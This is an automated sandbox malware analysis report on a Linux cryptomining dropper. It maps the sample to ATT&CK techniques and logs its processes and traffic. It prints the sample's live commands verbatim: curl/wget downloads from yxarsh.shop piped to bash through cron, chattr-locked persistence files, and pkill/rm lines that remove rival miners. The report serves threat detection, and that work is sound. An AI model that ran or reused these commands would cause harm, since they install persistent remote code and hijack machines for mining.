
Analysis Report pcXrXrdEB2

Overview

General Information

Joe Sandbox Version: 25.0.0
Analysis ID: 784804
Start date: 11.02.2019
Start time: 08:42:09
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 7m 23s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: pcXrXrdEB2
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: CentOS Linux 7.5 x64 (Kernel 3.10.0-862, Firefox 52.8.0, Document Viewer 3.22.1, LibreOffice 5.3.6.1, OpenJDK 1.8.0_171)
Detection: MAL
Classification: mal68.spre.troj.evad.mine.lin@0/10@12/0
Warnings:
  • Report size exceeded maximum capacity and may have missing behavior information.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Detection
Threshold | 68 | 0 - 100 | Report FP / FN | false | malicious

Classification

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control
Valid Accounts | Local Job Scheduling 11 | Local Job Scheduling 11 | Port Monitors | Masquerading 1 | Credential Dumping | Process Discovery 1 | Application Deployment Software | Data from Local System | Data Compressed | Uncommonly Used Port 1
Replication Through Removable Media | Command-Line Interface 1 | Hidden Files and Directories 1 | Accessibility Features | Hidden Files and Directories 1 | Network Sniffing | Security Software Discovery 1 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Standard Non-Application Layer Protocol 2
Drive-by Compromise | Scripting 1 | Accessibility Features | Path Interception | File Permissions Modification 11 | Input Capture | System Information Discovery 3 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Application Layer Protocol 2
Exploit Public-Facing Application | Scheduled Task | System Firmware | DLL Search Order Hijacking | Scripting 1 | Credentials in Files | System Network Configuration Discovery | Logon Scripts | Input Capture | Data Encrypted | Multiband Communication
Spearphishing Link | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | File Deletion 1 | Account Manipulation | Remote System Discovery | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol
Spearphishing Attachment | Graphical User Interface | Modify Existing Service | New Service | Indicator Removal on Host 11 | Brute Force | System Owner/User Discovery | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port

Signature Overview

Bitcoin Miner:

Found strings related to Crypto-Mining
  • Source: pcXrXrdEB2 | String found in binary or memory: rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
  • Source: pcXrXrdEB2 | String found in binary or memory: pkill -f cryptonight
  • Source: pcXrXrdEB2 | String found in binary or memory: pkill -f xmrigDaemon
Reads CPU information from /sys indicative of miner or evasive malware
  • Source: /tmp/r1x (PID: 13009) | Reads CPU info from /sys: /sys/devices/system/cpu/online
  • Source: /usr/lib/polkit-1/polkitd (PID: 9953) | Reads CPU info from /sys: /sys/devices/system/cpu/online

Spreading:

Found strings indicative of a multi-platform dropper
  • Source: pcXrXrdEB2 | String: (curl -fsSL --connect-timeout 120 http://yxarsh.shop/86 -o /var/tmp/r1x||wget http://yxarsh.shop/86 -O /var/tmp/r1x) && chmod +x /var/tmp/r1x
  • Source: pcXrXrdEB2 | String: (curl -fsSL --connect-timeout 120 http://yxarsh.shop/64 -o /tmp/r1x||wget http://yxarsh.shop/64 -O /tmp/r1x) && chmod +x /tmp/r1x
  • Source: pcXrXrdEB2 | String: (curl -fsSL --connect-timeout 120 http://yxarsh.shop/0 -o /usr/local/bin/dns||wget http://yxarsh.shop/0 -O /usr/local/bin/dns) && chmod 755 /usr/local/bin/dns && touch -acmr /bin/sh /usr/local/bin/dns && chattr +i /usr/local/bin/dns
  • Source: pcXrXrdEB2 | String: echo -e "*/10 * * * * root (curl -fsSL http://yxarsh.shop/1.jpg||wget -q -O- http://yxarsh.shop/1.jpg)|bash -sh\n##" > /etc/cron.d/root && touch -acmr /bin/sh /etc/cron.d/root && chattr +i /etc/cron.d/root
  • Source: pcXrXrdEB2 | String: echo -e "*/17 * * * * root (curl -fsSL http://yxarsh.shop/1.jpg||wget -q -O- http://yxarsh.shop/1.jpg)|bash -sh\n##" > /etc/cron.d/apache && touch -acmr /bin/sh /etc/cron.d/apache && chattr +i /etc/cron.d/apache
  • Source: pcXrXrdEB2 | String: echo -e "*/23 * * * * (curl -fsSL http://yxarsh.shop/1.jpg||wget -q -O- http://yxarsh.shop/1.jpg)|bash -sh\n##" > /var/spool/cron/root && touch -acmr /bin/sh /var/spool/cron/root && chattr +i /var/spool/cron/root
  • Source: pcXrXrdEB2 | String: echo -e "*/31 * * * * (curl -fsSL http://yxarsh.shop/1.jpg||wget -q -O- http://yxarsh.shop/1.jpg)|bash -sh\n##" > /var/spool/cron/crontabs/root && touch -acmr /bin/sh /var/spool/cron/crontabs/root && chattr +i /var/spool/cron/crontabs/root
  • Source: pcXrXrdEB2 | String: (curl -fsSL --connect-timeout 120 http://yxarsh.shop/0 -o /etc/cron.hourly/oanacroner||wget http://yxarsh.shop/0 -O /etc/cron.hourly/oanacroner) && chmod 755 /etc/cron.hourly/oanacroner
  • Source: pcXrXrdEB2 | String: (curl -fsSL --connect-timeout 120 http://yxarsh.shop/0 -o /etc/cron.daily/oanacroner||wget http://yxarsh.shop/0 -O /etc/cron.daily/oanacroner) && chmod 755 /etc/cron.daily/oanacroner
  • Source: pcXrXrdEB2 | String: (curl -fsSL --connect-timeout 120 http://yxarsh.shop/0 -o /etc/cron.monthly/oanacroner||wget http://yxarsh.shop/0 -O /etc/cron.monthly/oanacroner) && chmod 755 /etc/cron.monthly/oanacroner

Networking:

Detected TCP or UDP traffic on non-standard ports
  • Source: global traffic | TCP traffic: 192.168.1.101:55998 -> 198.35.45.242:26750
Downloads files from webservers via HTTP
  • Source: global traffic | HTTP traffic detected: GET /0 HTTP/1.1 | User-Agent: curl/7.29.0 | Host: yxarsh.shop | Accept: */*
  • Source: global traffic | HTTP traffic detected: GET /64 HTTP/1.1 | User-Agent: curl/7.29.0 | Host: yxarsh.shop | Accept: */*
Performs DNS lookups
  • Source: unknown | DNS traffic detected: queries for: yxarsh.shop
Urls found in memory or binary data
  • Source: pcXrXrdEB2 | String found in binary or memory: http://yxarsh.shop/0
  • Source: pcXrXrdEB2 | String found in binary or memory: http://yxarsh.shop/1.jpg
  • Source: pcXrXrdEB2 | String found in binary or memory: http://yxarsh.shop/1.jpg)
  • Source: pcXrXrdEB2 | String found in binary or memory: http://yxarsh.shop/64
  • Source: pcXrXrdEB2 | String found in binary or memory: http://yxarsh.shop/86

System Summary:

Sample contains strings that are potentially command strings
  • Source: Initial sample | Potential command found: pkill -f sourplum
  • Source: Initial sample | Potential command found: pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
  • Source: Initial sample | Potential command found: rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik
  • Source: Initial sample | Potential command found: rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
  • Source: Initial sample | Potential command found: rm -rf /tmp/*index_bak*
  • Source: Initial sample | Potential command found: rm -rf /tmp/*httpd.conf*
  • Source: Initial sample | Potential command found: rm -rf /tmp/*httpd.conf
  • Source: Initial sample | Potential command found: rm -rf /tmp/a7b104c270
  • Source: Initial sample | Potential command found: pkill -f kworkerds
  • Source: Initial sample | Potential command found: pkill -f biosetjenkins
  • Source: Initial sample | Potential command found: pkill -f AnXqV.yam
  • Source: Initial sample | Potential command found: pkill -f xmrigDaemon
  • Source: Initial sample | Potential command found: pkill -f xmrigMiner
  • Source: Initial sample | Potential command found: pkill -f xmrig
  • Source: Initial sample | Potential command found: pkill -f Loopback
  • Source: Initial sample | Potential command found: pkill -f apaceha
  • Source: Initial sample | Potential command found: pkill -f cryptonight
  • Source: Initial sample | Potential command found: pkill -f stratum
  • Source: Initial sample | Potential command found: pkill -f mixnerdx
  • Source: Initial sample | Potential command found: pkill -f performedl
  • Source: Initial sample | Potential command found: pkill -f JnKihGjn
  • Source: Initial sample | Potential command found: pkill -f irqba2anc1
  • Source: Initial sample | Potential command found: pkill -f irqba5xnc1
  • Source: Initial sample | Potential command found: pkill -f irqbnc1
  • Source: Initial sample | Potential command found: pkill -f ir29xc1
  • Source: Initial sample | Potential command found: pkill -f conns
  • Source: Initial sample | Potential command found: pkill -f irqbalance
  • Source: Initial sample | Potential command found: pkill -f crypto-pool
  • Source: Initial sample | Potential command found: pkill -f minexmr
  • Source: Initial sample | Potential command found: pkill -f XJnRj
  • Source: Initial sample | Potential command found: pkill -f NXLAi
  • Source: Initial sample | Potential command found: pkill -f BI5zj
  • Source: Initial sample | Potential command found: pkill -f askdljlqw
  • Source: Initial sample | Potential command found: pkill -f minerd
  • Source: Initial sample | Potential command found: pkill -f minergate
  • Source: Initial sample | Potential command found: pkill -f Guard.sh
  • Source: Initial sample | Potential command found: pkill -f ysaydh
  • Source: Initial sample | Potential command found: pkill -f bonns
  • Source: Initial sample | Potential command found: pkill -f donns
  • Source: Initial sample | Potential command found: pkill -f kxjd
  • Source: Initial sample | Potential command found: pkill -f Duck.sh
  • Source: Initial sample | Potential command found: pkill -f bonn.sh
  • Source: Initial sample | Potential command found: pkill -f conn.sh
  • Source: Initial sample | Potential command found: pkill -f kworker34
  • Source: Initial sample | Potential command found: pkill -f kw.sh
  • Source: Initial sample | Potential command found: pkill -f pro.sh
  • Source: Initial sample | Potential command found: pkill -f polkitd
  • Source: Initial sample | Potential command found: pkill -f acpid
  • Source: Initial sample | Potential command found: pkill -f icb5o
  • Source: Initial sample | Potential command found: pkill -f nopxi
  • Source: Initial sample | Potential command found: pkill -f irqbalanc1
  • Source: Initial sample | Potential command found: pkill -f i586
  • Source: Initial sample | Potential command found: pkill -f gddr
  • Source: Initial sample | Potential command found: pkill -f mstxmr
  • Source: Initial sample | Potential command found: pkill -f ddg.2011
  • Source: Initial sample | Potential command found: pkill -f wnTKYg
  • Source: Initial sample | Potential command found: pkill -f deamon
  • Source: Initial sample | Potential command found: pkill -f disk_genius
  • Source: Initial sample | Potential command found: pkill -f bashx
  • Source: Initial sample | Potential command found: pkill -f bashg
  • Source: Initial sample | Potential command found: pkill -f bashe
  • Source: Initial sample | Potential command found: pkill -f bashf
  • Source: Initial sample | Potential command found: pkill -f bashh
  • Source: Initial sample | Potential command found: pkill -f XbashY
  • Source: Initial sample | Potential command found: pkill -f libapache
  • Source: Initial sample | Potential command found: pkill -f qW3xT.2
  • Source: Initial sample | Potential command found: pkill -f /usr/bin/.sshd
  • Source: Initial sample | Potential command found: pkill -f sustes
  • Source: Initial sample | Potential command found: pkill -f Xbash
  • Source: Initial sample | Potential command found: rm -rf /var/tmp/j*
  • Source: Initial sample | Potential command found: rm -rf /tmp/j*
  • Source: Initial sample | Potential command found: rm -rf /var/tmp/java
  • Source: Initial sample | Potential command found: rm -rf /tmp/java
  • Source: Initial sample | Potential command found: rm -rf /var/tmp/java2
  • Source: Initial sample | Potential command found: rm -rf /tmp/java2
  • Source: Initial sample | Potential command found: rm -rf /var/tmp/java*
  • Source: Initial sample | Potential command found: rm -rf /tmp/java*
  • Source: Initial sample | Potential command found: rm -rf /tmp/httpd.conf
  • Source: Initial sample | Potential command found: rm -rf /tmp/conn
  • Source: Initial sample | Potential command found: rm -rf /tmp/.uninstall* /tmp/.python* /tmp/.tables* /tmp/.mas
  • Source: Initial sample | Potential command found: rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
  • Source: Initial sample | Potential command found: chattr -i /tmp/kworkerds /var/tmp/kworkerds /var/tmp/config.json /tmp/.systemd-private-*
  • Source: Initial sample | Potential command found: rm -rf /tmp/kworkerds /var/tmp/kworkerds /var/tmp/config.json /tmp/.systemd-private-* .systemd-private-*
  • Source: Initial sample | Potential command found: chattr -i /usr/lib/libiacpkmn.so.3 && rm -rf /usr/lib/libiacpkmn.so.3
  • Source: Initial sample | Potential command found: chattr -i /etc/init.d/nfstruncate && rm -rf /etc/init.d/nfstruncate
  • Source: Initial sample | Potential command found: chattr -i /bin/nfstruncate && rm -rf /bin/nfstruncate
  • Source: Initial sample | Potential command found: rm -rf /etc/rc*.d/S01nfstruncate /etc/rc.d/rc*.d/S01nfstruncate
  • Source: Initial sample | Potential command found: chattr -i /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc*.d/S01acpidtd /etc/rc*.d/S01acpidtd /etc/ld.sc.conf
  • Source: Initial sample | Potential command found: rm -rf /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc*.d/S01acpidtd /etc/rc*.d/S01acpidtd /etc/ld.sc.conf
  • Source: Initial sample | Potential command found: mkdir -p /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
  • Source: Initial sample | Potential command found: touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
  • Source: Initial sample | Potential command found: chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
  • Source: Initial sample | Potential command found: chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
  • Source: Initial sample | Potential command found: ps auxf|grep -v grep|grep -v "\_" |grep -v "kthreadd" |grep "\[.*\]"|awk '{print $2}'|xargs kill -9
  • Source: Initial sample | Potential command found: ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
  • Source: Initial sample | Potential command found: ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9
  • Source: Initial sample | Potential command found: ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9
  • Source: Initial sample | Potential command found: ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -9
  • Source: Initial sample | Potential command found: ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
  • Source: Initial sample | Potential command found: ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
Sample tries to kill a process (SIGKILL)
Classification label
  • Source: classification engine | Classification label: mal68.spre.troj.evad.mine.lin@0/10@12/0

Persistence and Installation Behavior:

Protects files from modification
  • Source: /bin/bash (PID: 10411) | Args: chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
  • Source: /bin/bash (PID: 12109) | Args: chattr +i /usr/local/bin/dns
  • Source: /bin/bash (PID: 12126) | Args: chattr +i /etc/cron.d/root
  • Source: /bin/bash (PID: 12141) | Args: chattr +i /etc/cron.d/apache
  • Source: /bin/bash (PID: 12155) | Args: chattr +i /var/spool/cron/root
  • Source: /bin/bash (PID: 12176) | Args: chattr +i /var/spool/cron/crontabs/root
Sample tries to persist itself using cron
  • Source: /bin/bash (PID: 9334) | File: /etc/crontab
  • Source: /bin/bash (PID: 9334) | File: /etc/cron.d/root
  • Source: /bin/bash (PID: 9334) | File: /etc/cron.d/apache
  • Source: /bin/bash (PID: 9334) | File: /var/spool/cron/root
  • Source: /bin/bash (PID: 9334) | File: /var/spool/cron/crontabs/root
  • Source: /bin/curl (PID: 12198) | File: /etc/cron.hourly/oanacroner
  • Source: /bin/curl (PID: 12403) | File: /etc/cron.daily/oanacroner
  • Source: /bin/curl (PID: 12542) | File: /etc/cron.monthly/oanacroner
Creates hidden files and/or directories
  • Source: /usr/lib/polkit-1/polkitd (PID: 9953) | Directory: /.cache
Enumerates processes within the "proc" file system
Source: /bin/pkill (PID: 10090)File opened: /proc/9995/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/6246/status
Source: /bin/pkill (PID: 10090)File opened: /proc/6246/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/18/status
Source: /bin/pkill (PID: 10090)File opened: /proc/18/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/19/status
Source: /bin/pkill (PID: 10090)File opened: /proc/19/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/362/status
Source: /bin/pkill (PID: 10090)File opened: /proc/362/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/363/status
Source: /bin/pkill (PID: 10090)File opened: /proc/363/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/1/status
Source: /bin/pkill (PID: 10090)File opened: /proc/1/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/2/status
Source: /bin/pkill (PID: 10090)File opened: /proc/2/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/3/status
Source: /bin/pkill (PID: 10090)File opened: /proc/3/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/5/status
Source: /bin/pkill (PID: 10090)File opened: /proc/5/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/8/status
Source: /bin/pkill (PID: 10090)File opened: /proc/8/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7448/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7448/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/9/status
Source: /bin/pkill (PID: 10090)File opened: /proc/9/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7568/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7568/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7329/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7329/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/20/status
Source: /bin/pkill (PID: 10090)File opened: /proc/20/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/21/status
Source: /bin/pkill (PID: 10090)File opened: /proc/21/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7582/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7582/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7345/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7345/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/27/status
Source: /bin/pkill (PID: 10090)File opened: /proc/27/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/10072/status
Source: /bin/pkill (PID: 10090)File opened: /proc/10072/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/28/status
Source: /bin/pkill (PID: 10090)File opened: /proc/28/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7589/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7589/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/29/status
Source: /bin/pkill (PID: 10090)File opened: /proc/29/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/1361/status
Source: /bin/pkill (PID: 10090)File opened: /proc/1361/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/490/status
Source: /bin/pkill (PID: 10090)File opened: /proc/490/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/375/status
Source: /bin/pkill (PID: 10090)File opened: /proc/375/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/376/status
Source: /bin/pkill (PID: 10090)File opened: /proc/376/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/377/status
Source: /bin/pkill (PID: 10090)File opened: /proc/377/cmdline
Executes the "chmod" command used to modify permissions
Source: /bin/bash (PID: 10405)Chmod executable: /bin/chmod -> chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
Source: /bin/bash (PID: 12103)Chmod executable: /bin/chmod -> chmod 755 /usr/local/bin/dns
Source: /bin/bash (PID: 12391)Chmod executable: /bin/chmod -> chmod 755 /etc/cron.hourly/oanacroner
Source: /bin/bash (PID: 12530)Chmod executable: /bin/chmod -> chmod 755 /etc/cron.daily/oanacroner
Source: /bin/bash (PID: 12694)Chmod executable: /bin/chmod -> chmod 755 /etc/cron.monthly/oanacroner
Source: /bin/bash (PID: 13008)Chmod executable: /bin/chmod -> chmod +x /tmp/r1x
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/bash (PID: 10418)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10419)Grep executable: /bin/grep -> grep -v \\_
Source: /bin/bash (PID: 10420)Grep executable: /bin/grep -> grep -v kthreadd
Source: /bin/bash (PID: 10421)Grep executable: /bin/grep -> grep \\[.*\\]
Source: /bin/bash (PID: 10465)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10466)Grep executable: /bin/grep -> grep xmrig
Source: /bin/bash (PID: 10499)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10500)Grep executable: /bin/grep -> grep xmrigDaemon
Source: /bin/bash (PID: 10542)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10543)Grep executable: /bin/grep -> grep xmrigMiner
Source: /bin/bash (PID: 10578)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10579)Grep executable: /bin/grep -> grep xig
Source: /bin/bash (PID: 10615)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10616)Grep executable: /bin/grep -> grep ddgs
Source: /bin/bash (PID: 10650)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10651)Grep executable: /bin/grep -> grep qW3xT
Source: /bin/bash (PID: 10676)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10677)Grep executable: /bin/grep -> grep t00ls.ru
Source: /bin/bash (PID: 10713)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10714)Grep executable: /bin/grep -> grep /var/tmp/sustes
Source: /bin/bash (PID: 10743)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10744)Grep executable: /bin/grep -> grep sustes
Source: /bin/bash (PID: 10774)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10775)Grep executable: /bin/grep -> grep Xbash
Source: /bin/bash (PID: 10809)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10810)Grep executable: /bin/grep -> grep hashfish
Source: /bin/bash (PID: 10840)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10841)Grep executable: /bin/grep -> grep cranbery
Source: /bin/bash (PID: 10871)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10872)Grep executable: /bin/grep -> grep stratum
Source: /bin/bash (PID: 10907)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10908)Grep executable: /bin/grep -> grep xmr
Source: /bin/bash (PID: 10945)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10946)Grep executable: /bin/grep -> grep minerd
Source: /bin/bash (PID: 10981)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10982)Grep executable: /bin/grep -> grep /tmp/thisxxs
Source: /bin/bash (PID: 11017)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 11018)Grep executable: /bin/grep -> grep /opt/yilu/work/xig/xig
Source: /bin/bash (PID: 11047)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 11048)Grep executable: /bin/grep -> grep /opt/yilu/mservice
Source: /bin/bash (PID: 11080)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 11081)Grep executable: /bin/grep -> grep /usr/bin/.sshd
Source: /bin/bash (PID: 11120)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 11146)Grep executable: /bin/grep -> grep 69.28.55.86:443
Source: /bin/bash (PID: 11199)Grep executable: /bin/grep -> grep 185.71.65.238
Source: /bin/bash (PID: 11255)Grep executable: /bin/grep -> grep 140.82.52.87
Source: /bin/bash (PID: 11303)Grep executable: /bin/grep -> grep :3333
Source: /bin/bash (PID: 11340)Grep executable: /bin/grep -> grep :4444
Source: /bin/bash (PID: 11388)Grep executable: /bin/grep -> grep :5555
Source: /bin/bash (PID: 11438)Grep executable: /bin/grep -> grep :6666
Source: /bin/bash (PID: 11503)Grep executable: /bin/grep -> grep :7777
Source: /bin/bash (PID: 11560)Grep executable: /bin/grep -> grep :3347
Source: /bin/bash (PID: 11619)Grep executable: /bin/grep -> grep :14444
Source: /bin/bash (PID: 11678)Grep executable: /bin/grep -> grep :14433
Source: /bin/bash (PID: 11732)Grep executable: /bin/grep -> grep :56415
Source: /bin/bash (PID: 12712)Grep executable: /bin/grep -> grep r1x
Source: /bin/bash (PID: 12713)Grep executable: /bin/grep -> grep -v grep
Executes the "kill" command typically used to terminate processes
Source: /bin/xargs (PID: 10454)Kill executable: /bin/kill -> kill -9 689 9917 9926 9935 9941 9948 9956 9960 9967 9975 9981 9986 9995 10001 10006 10013 10019 10025 10033 10040 10045 10053 10058 10065 10072 10078 10086 10092 10097 10106 10111 10118 10124 10130 10138 10148 10154 10162 10169 10180 10184 10188 10197 10206 10211 10215 10225 10231 10239 10244 10249 10259 10264 10272 10277 10285 10294 10299 10307 10315 10321 10326 10333 10341 10348 10356 10362 10370 10376 10385 10390
Source: /bin/xargs (PID: 10491)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10533)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10564)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10592)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10642)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10668)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10704)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10735)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10753)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10795)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10826)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10865)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10899)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10936)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10973)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11009)Kill executable: /bin/kill -> kill
Source: /bin/xargs (PID: 11027)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11057)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11094)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11131)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11191)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11246)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11295)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11331)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11350)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11429)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11490)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11552)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11611)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11668)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11723)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11773)Kill executable: /bin/kill -> kill -9
Executes the "mkdir" command used to create folders
Source: /bin/bash (PID: 10387)Mkdir executable: /bin/mkdir -> mkdir -p /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
Source: /bin/bash (PID: 12162)Mkdir executable: /bin/mkdir -> mkdir -p /var/spool/cron/crontabs
Source: /bin/bash (PID: 12184)Mkdir executable: /bin/mkdir -> mkdir -p /etc/cron.hourly
Source: /bin/bash (PID: 12394)Mkdir executable: /bin/mkdir -> mkdir -p /etc/cron.daily
Source: /bin/bash (PID: 12532)Mkdir executable: /bin/mkdir -> mkdir -p /etc/cron.monthly
Executes the "nohup" (no hangup) command used to keep a background process from being killed when its terminal closes
Source: /bin/bash (PID: 13009)Nohup executable: /bin/nohup -> nohup /tmp/r1x
Executes the "ps" command used to list the status of processes
Source: /bin/bash (PID: 10417)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10464)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10498)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10541)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10577)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10614)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10649)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10675)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10712)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10742)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10773)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10808)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10839)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10870)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10906)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10944)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10980)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 11016)Ps executable: /bin/ps -> ps auxf
